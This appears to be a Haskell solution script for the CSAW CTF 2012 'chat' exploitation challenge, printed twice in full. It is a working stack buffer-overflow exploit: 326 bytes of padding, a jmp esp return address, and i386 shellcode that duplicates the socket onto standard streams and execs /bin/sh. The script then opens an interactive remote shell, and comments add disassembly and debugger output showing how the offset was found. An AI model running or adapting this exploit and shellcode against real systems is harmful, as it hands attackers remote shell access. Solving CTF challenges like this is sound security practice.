Tosainu/exploit.hs

## exploit.hs
{-# LANGUAGE OverloadedStrings #-}

-- CSAW CTF Qualification Round 2012: 聊天
-- http://shell-storm.org/repo/CTF/CSAW-2012/Exploitation/300/

import           Control.Monad
import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Numeric               (showHex)

-- https://github.com/Tosainu/pwn.hs/tree/bee9e20
import           Pwn

cfg = defaultConfig { arch = "i386"
                    , bits = 32
                    }

main :: IO ()
main = pwnWith cfg $ do
  r <- remote "192.168.122.10" 4842
  recvline r

  -- [0x080488b0]> pdf @ sub.read_86e
  -- ╭ (fcn) sub.read_86e 42
  -- │   sub.read_86e ();
  -- │           ; var int local_4h @ esp+0x4
  -- │           ; var int local_8h @ esp+0x8
  -- │           ; var int local_16h @ esp+0x16
  -- │           ; UNKNOWN XREF from 0x080487d5 (fcn.080487d5)
  -- │           ; CALL XREF from 0x080488a7 (sub._898)
  -- │           0x0804886e      81ec5c010000   sub esp, 0x15c
  -- │           0x08048874      a178b00408     mov eax, dword [obj.sockfd] ; [0x804b078:4]=0
  -- │           0x08048879      c74424080008.  mov dword [esp + local_8h], 0x800 ; [0x800:4]=-1 ; 2048
  -- │           0x08048881      8d542416       lea edx, dword [esp + local_16h] ; 0x16 ; 22
  -- │           0x08048885      89542404       mov dword [esp + local_4h], edx
  -- │           0x08048889      890424         mov dword [esp], eax
  -- │           0x0804888c      e86ffdffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
  -- │           0x08048891      81c45c010000   add esp, 0x15c
  -- ╰           0x08048897      c3             ret

  -- gef➤  reg
  -- $eax   : 0x00000800
  -- $ebx   : 0x000004a2
  -- $ecx   : 0xffffc546  →  "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQA[...]"
  -- $edx   : 0x00000800
  -- $esp   : 0xffffc690  →  "xAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEA[...]"
  -- $ebp   : 0xffffd528  →  0x00000000
  -- $esi   : 0xf7fc6000  →  0x001b1db0
  -- $edi   : 0x08048e49  →   call 0x96eb2d0d
  -- $eip   : 0x42417742 ("BwAB"?)
  -- gef➤  !ragg2 -q 0x42417742
  -- Little endian: 326
  -- Big endian: -1

  eshellcode <- asm $ BS.intercalate "\n"
    [ "xor edx, edx"
    , "/* dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); */"
    , "lea ebx, [edx+4]"
    , "mov ecx, edx"
    , "loop:"
    , "lea eax, [edx+0x3f]"
    , "int 0x80"
    , "inc ecx"
    , "cmp cl, 0x3"
    , "jne loop"
    , "/* execve(\"/bin/sh, [\"/bin/sh\"], 0); */"
    , "push edx"
    , "push 0x68732f2f"
    , "push 0x6e69622f"
    , "mov ebx, esp"
    , "push edx"
    , "push ebx"
    , "mov ecx, esp"
    , "lea eax, [edx+11]"
    , "int 0x80"
    , "lea eax, [edx+1]"
    , "int 0x80"
    ]

  let shellcode = case eshellcode of
                       Right s -> s
                       Left  e -> error e

      jmp_esp = 0x08048f47 -- 0x08048f47: jmp esp ;  (2 found)
      buf = BS.concat $ catMaybes
              [ Just $ BS.replicate 326 'a'
              , p32 jmp_esp
              , Just shellcode
              ]

  sendline r buf
  interactive r
	{-# LANGUAGE OverloadedStrings #-}

	-- CSAW CTF Qualification Round 2012: 聊天
	-- http://shell-storm.org/repo/CTF/CSAW-2012/Exploitation/300/

	import Control.Monad
	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Maybe
	import Data.Monoid ((<>))
	import Numeric (showHex)

	-- https://github.com/Tosainu/pwn.hs/tree/bee9e20
	import Pwn

	cfg = defaultConfig { arch = "i386"
	, bits = 32
	}

	main :: IO ()
	main = pwnWith cfg $ do
	r <- remote "192.168.122.10" 4842
	recvline r

	-- [0x080488b0]> pdf @ sub.read_86e
	-- ╭ (fcn) sub.read_86e 42
	-- │ sub.read_86e ();
	-- │ ; var int local_4h @ esp+0x4
	-- │ ; var int local_8h @ esp+0x8
	-- │ ; var int local_16h @ esp+0x16
	-- │ ; UNKNOWN XREF from 0x080487d5 (fcn.080487d5)
	-- │ ; CALL XREF from 0x080488a7 (sub._898)
	-- │ 0x0804886e 81ec5c010000 sub esp, 0x15c
	-- │ 0x08048874 a178b00408 mov eax, dword [obj.sockfd] ; [0x804b078:4]=0
	-- │ 0x08048879 c74424080008. mov dword [esp + local_8h], 0x800 ; [0x800:4]=-1 ; 2048
	-- │ 0x08048881 8d542416 lea edx, dword [esp + local_16h] ; 0x16 ; 22
	-- │ 0x08048885 89542404 mov dword [esp + local_4h], edx
	-- │ 0x08048889 890424 mov dword [esp], eax
	-- │ 0x0804888c e86ffdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
	-- │ 0x08048891 81c45c010000 add esp, 0x15c
	-- ╰ 0x08048897 c3 ret

	-- gef➤ reg
	-- $eax : 0x00000800
	-- $ebx : 0x000004a2
	-- $ecx : 0xffffc546 → "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQA[...]"
	-- $edx : 0x00000800
	-- $esp : 0xffffc690 → "xAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEA[...]"
	-- $ebp : 0xffffd528 → 0x00000000
	-- $esi : 0xf7fc6000 → 0x001b1db0
	-- $edi : 0x08048e49 → call 0x96eb2d0d
	-- $eip : 0x42417742 ("BwAB"?)
	-- gef➤ !ragg2 -q 0x42417742
	-- Little endian: 326
	-- Big endian: -1

	eshellcode <- asm $ BS.intercalate "\n"
	[ "xor edx, edx"
	, "/* dup2(fd, 0); dup2(fd, 1); dup2(fd, 2); */"
	, "lea ebx, [edx+4]"
	, "mov ecx, edx"
	, "loop:"
	, "lea eax, [edx+0x3f]"
	, "int 0x80"
	, "inc ecx"
	, "cmp cl, 0x3"
	, "jne loop"
	, "/* execve(\"/bin/sh, [\"/bin/sh\"], 0); */"
	, "push edx"
	, "push 0x68732f2f"
	, "push 0x6e69622f"
	, "mov ebx, esp"
	, "push edx"
	, "push ebx"
	, "mov ecx, esp"
	, "lea eax, [edx+11]"
	, "int 0x80"
	, "lea eax, [edx+1]"
	, "int 0x80"
	]

	let shellcode = case eshellcode of
	Right s -> s
	Left e -> error e

	jmp_esp = 0x08048f47 -- 0x08048f47: jmp esp ; (2 found)
	buf = BS.concat $ catMaybes
	[ Just $ BS.replicate 326 'a'
	, p32 jmp_esp
	, Just shellcode
	]

	sendline r buf
	interactive r